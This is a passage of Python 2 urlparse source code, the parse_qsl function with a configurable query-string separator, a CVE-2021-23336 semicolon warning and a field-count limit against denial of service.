        is looked up in this order: the cached config-file value, the
        PYTHON_URLLIB_QS_SEPARATOR environment variable, the config file
        itself, and finally '&'.  A default taken from the environment or
        the config file must be one character long or the word "legacy",
        which makes both '&' and ';' act as separators.

    Returns a list of (name, value) tuples.

    Raises ValueError for an empty or non-string separator, an invalid
    configured default, too many fields, or (with strict_parsing) a
    field without '='.
    """
    if (not separator or (not isinstance(separator, (str, bytes)))) and separator is not None:
        raise ValueError("Separator must be of type string or bytes.")

    # Used when both "&" and ";" act as separators. (Need a non-string value.)
    _legacy = object()

    if separator is None:
        global _default_qs_separator
        separator = _default_qs_separator
        envvar_name = 'PYTHON_URLLIB_QS_SEPARATOR'
        # The cache is only ever filled from the config file, so a cached
        # value is attributed to it.  Without this binding, an invalid
        # cached value hit an unbound ``config_source`` below and raised
        # UnboundLocalError instead of the intended ValueError.
        config_source = _QS_SEPARATOR_CONFIG_FILENAME
        if separator is None:
            # Set default separator from environment variable
            separator = os.environ.get(envvar_name)
            config_source = 'environment variable'
        if separator is None:
            # Set default separator from the configuration file
            try:
                cfg_file = open(_QS_SEPARATOR_CONFIG_FILENAME)
            except EnvironmentError:
                # No readable config file: fall through to the built-in '&'.
                pass
            else:
                with cfg_file:
                    import ConfigParser
                    config = ConfigParser.ConfigParser()
                    config.readfp(cfg_file)
                    separator = config.get('parse_qs', envvar_name)
                    _default_qs_separator = separator
                config_source = _QS_SEPARATOR_CONFIG_FILENAME
        if separator is None:
            # The default is '&', but warn if not specified explicitly
            if ';' in qs:
                from warnings import warn
                warn("The default separator of urlparse.parse_qsl and "
                    + "parse_qs was changed to '&' to avoid a web cache "
                    + "poisoning issue (CVE-2021-23336). "
                    + "By default, semicolons no longer act as query field "
                    + "separators. "
                    + "See https://access.redhat.com/articles/5860431 for "
                    + "more details.",
                    _QueryStringSeparatorWarning, stacklevel=2)
            separator = '&'
        elif separator == 'legacy':
            separator = _legacy
        elif len(separator) != 1:
            raise ValueError(
                '{} (from {}) must contain '.format(envvar_name, config_source)
                + '1 character, or "legacy". See '
                + 'https://access.redhat.com/articles/5860431 for more details.'
            )

    # If max_num_fields is defined then check that the number of fields
    # is less than max_num_fields. This prevents a memory exhaustion DOS
    # attack via post bodies with many fields.
    if max_num_fields is not None:
        if separator is _legacy:
            num_fields = 1 + qs.count('&') + qs.count(';')
        else:
            num_fields = 1 + qs.count(separator)
        if max_num_fields < num_fields:
            raise ValueError('Max number of fields exceeded')

    if separator is _legacy:
        pairs = [s2 for s1 in qs.split('&') for s2 in s1.split(';')]
    else:
        pairs = qs.split(separator)

    r = []
    for name_value in pairs:
        if not name_value and not strict_parsing:
            continue
        nv = name_value.split('=', 1)
        if len(nv) != 2:
            if strict_parsing:
                # Call form: same exception, valid on Python 2 and 3.
                raise ValueError("bad query field: %r" % (name_value,))
            # Handle case of a control-name with no equal sign
            if keep_blank_values:
                nv.append('')
            else:
                continue
        if len(nv[1]) or keep_blank_values:
            name = unquote(nv[0].replace('+', ' '))
            value = unquote(nv[1].replace('+', ' '))
            r.append((name, value))

    return r